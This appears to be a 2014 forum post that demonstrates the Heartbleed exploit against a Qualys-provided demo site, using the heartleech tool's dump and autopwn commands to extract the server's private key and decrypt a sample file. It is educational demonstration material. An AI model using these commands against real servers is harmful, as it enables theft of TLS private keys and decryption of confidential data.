AnsweredAssumed Answered

HeartBleed: exploit process explained against test website

Question asked by Nicola Bressan on May 2, 2014

Here's how the Heartbleed exploit can be used against a website.

 

Testing target (kindly provided by Qualys): https://hbdemo.kandek.com

 

heartleech_1b.png

 

after register in this website an user can freely download a crypted file: supersecret.txt.enc (example file, secret because crypted with private key of webserver)

 

heartleech_1a.png

 

an attacker can use a simple tool like heartleech (https://github.com/robertdavidgraham/heartleech) to attack the website

 

so first step is: download the tool (git cloning the project or simply compiling the heartbleed.c, following instructions in the website above)

 

after getting the tool, we see that there are different working modes:

 

./heartleech target_site --dump file

 

will continuosly send malicious heartbleed packets to webserver getting more and more memory data dumps in a file that can be analyzed later...

 

./heartleech target_site --autopwn

 

will instead automatically fetch the certificate from the website and then continue downloading information until it finds a matching private key within the heartbleed information data

 

we are more interested in this auto-mode

 

so running:

 

./heartleech hbdemo.kandek.com --autopwn

 

in terminal will return us the private key, great find!

 

heartleech_1.png

 

having the private key, we just need to save it in a file, called for example private.key (great fantasy) and extract the data from the secret file we have download before is just the matter of a command:

 

heartleech_2.png

 

So the secure content of the file is now decrypted, the secret phrase is:

 

Darth Vader is Luke's father.

and Leia is Luke's sister.

 

This is amazing simple, go and try yourself!

 

I would like to thank Qualys for providing the target for live testing and Wolfgang Kandek for providing the interesting webinar "A Post-Mortem on Heartbleed - What Worked and What Didn't" still available for playback at http://event.qualys.com/797ENI74200015u00aTee00

Outcomes